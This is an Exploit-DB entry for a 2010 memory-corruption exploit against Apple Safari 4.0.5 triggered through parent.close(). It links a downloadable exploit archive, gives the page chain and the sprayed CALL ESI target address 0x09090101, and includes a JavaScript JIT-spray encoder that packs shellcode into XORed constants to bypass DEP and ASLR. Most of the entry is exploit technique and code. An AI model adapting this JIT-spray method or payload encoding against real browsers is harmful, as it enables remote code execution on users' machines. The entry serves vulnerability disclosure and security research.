Apple Safari 4.0.5 – ‘parent.close()’ Memory Corruption (ASLR + DEP Bypass)

  • Author: Alexey Sintsov
    Date: 2010-05-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12614/
  • Download:
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12614.zip (safari_parent_close_sintsov.zip)
    
    Unzip and run START.htm
    
    This exploit uses JIT spray to bypass both DEP and ASLR: the JIT-compiled
    constants are sprayed at predictable addresses, so no code pointer has to be leaked.
    JIT shellcode: system("notepad")
    
    0day.html uses the address 0x09090101 as the CALL target into the JITed shellcode.
    
    
    START.htm -> iff.htm -> if1.htm -> 0day.html
                    |                     |
                    |                     |
                JIT-SPRAY             parent.close();
          0x09090101 - JITed      *   ESI=0x09090101
               shellcode          *   CALL ESI
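    
    The constant-chain encoding that the notes above rely on, as an added example
    (not code from the archive and not Sintsov's own sprayer): it packs a payload
    into XORed 32-bit constants whose top byte is 0x3C, models the MOV EAX,imm32 /
    XOR EAX,imm32 sequence an x86 JIT is assumed to emit for that expression, and
    checks which bytes execute when control enters the stream one byte in, which is
    what CALL ESI with ESI=0x09090101 is meant to achieve. The STAGE0 bytes are a
    constructed stand-in for the system("notepad") shellcode, and the emission
    pattern is an assumption about the JIT, not something read out of Safari.
    
```javascript
// Added example: JIT-spray constant chaining. Not from the 12614 archive.
//
// Assumption: the JIT compiles   (0x3Caabbcc ^ 0x3Cddeeff ^ ...)   into
//     B8 cc bb aa 3C   MOV EAX, imm32
//     35 ff ee dd 3C   XOR EAX, imm32   (repeated per constant)
// Entering at +1 (inside the MOV) executes the three low bytes of each constant,
// then "3C 35" decodes as CMP AL, 0x35, which swallows the next XOR opcode.
// Consequence: every 3-byte group must hold complete instructions, otherwise
// the CMP AL byte lands in the middle of one.

const GUARD = 0x3c; // CMP AL, imm8

// Constructed stand-in payload; each 3-byte group is self-contained x86.
const STAGE0 = [
  0x31, 0xc0, 0x90, // xor eax,eax ; nop
  0x50, 0x5b, 0x90, // push eax ; pop ebx ; nop
  0xcc, 0x90, 0x90, // int3 ; nop ; nop   (placeholder for system("notepad"))
];

// Pad to a multiple of 3 with NOPs, then pack each group as 0x3C | b2 b1 b0.
function encodeConstants(shellcode) {
  const bytes = shellcode.slice();
  while (bytes.length % 3 !== 0) bytes.push(0x90);
  const consts = [];
  for (let i = 0; i < bytes.length; i += 3) {
    consts.push((((GUARD << 24) | (bytes[i + 2] << 16) | (bytes[i + 1] << 8) | bytes[i])) >>> 0);
  }
  return consts;
}

// The JavaScript a sprayer would compile many times to fill the heap with
// copies of the same instruction stream.
function sprayExpression(shellcode) {
  const hex = encodeConstants(shellcode).map(c => "0x" + c.toString(16).padStart(8, "0"));
  return "var y = (" + hex.join(" ^ ") + ");";
}

// Model of the x86 the JIT emits for that expression (assumption stated above).
function jitBytes(consts) {
  const out = [];
  consts.forEach((c, i) => {
    out.push(i === 0 ? 0xb8 : 0x35); // MOV EAX,imm32 then XOR EAX,imm32
    out.push(c & 0xff, (c >>> 8) & 0xff, (c >>> 16) & 0xff, (c >>> 24) & 0xff);
  });
  return out;
}

// Walk the stream from a misaligned entry point: three payload bytes run,
// then the guard byte must be 0x3C so that "3C 35" is one harmless CMP AL.
function bytesExecutedFrom(code, entry) {
  const executed = [];
  let pc = entry;
  while (pc < code.length) {
    executed.push(code[pc], code[pc + 1], code[pc + 2]);
    if (code[pc + 3] !== GUARD) {
      throw new Error("guard byte missing at offset " + (pc + 3) + ": chain would desync");
    }
    pc += 5; // CMP AL, imm8 consumed the 0x35 of the next XOR
  }
  return executed;
}

// Round trip on the constructed payload: what runs from +1 is exactly STAGE0.
function demo() {
  const code = jitBytes(encodeConstants(STAGE0));
  return bytesExecutedFrom(code, 1);
}
```
    
    Only the encoding is shown here; the heap-layout side of the spray (compiling the
    expression enough times that 0x09090101 reliably falls one byte into a copy of the
    chain) depends on the JIT's allocator and is not modelled.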
    
    By Alexey Sintsov
    from
    Digital Security Research Group
    
    [www.dsecrg.com]